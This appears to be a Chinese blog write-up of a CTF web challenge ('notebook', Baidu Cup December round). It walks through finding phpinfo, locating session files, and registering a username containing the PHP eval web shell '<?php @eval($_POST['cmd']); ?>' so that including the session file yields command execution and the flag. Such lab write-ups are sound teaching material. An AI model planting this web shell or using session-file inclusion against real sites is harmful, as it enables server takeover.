“百度杯”CTF比赛 十二月场 notebook

tip指出,在phpinfo中有文件包含漏洞

 

打开网页,先尝试注册登录

这里注意,使用burp每次都进行查看

看到

跟文件有关系,那就得注意

打开御剑搜索一波

找到了robots.txt

找到phpinfo,进入

然鹅没有什么东西能注意,我尝试了cookie中加入一句话木马,后面phpinfo会显示,但是尖括号都被编码了。

从哪个file参数入手

 

我百度一波大佬的,了解到通过action跳转的phpinfo中,session存入用户可访问的tmp/SESS中

 

那就从session入手

打开burp获取到PHPSESSION为a4tpmb0mkmq1k9hfh6lvrfit90,但为文件时则为sess_a4tpmb0mkmq1k9hfh6lvrfit90。

由此获得session

能获取到用户名,再通过创建用户名为   <?php @eval($_POST['cmd']); ?>,再次打开

 

这儿我尝试使用蚁剑无法连接,只能通过hackbar获取

先ls再找flag,flag在源代码中

 

ps:关于php session

在自己存储session位置找到,这个位置在phpinfo中找session.save_path

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值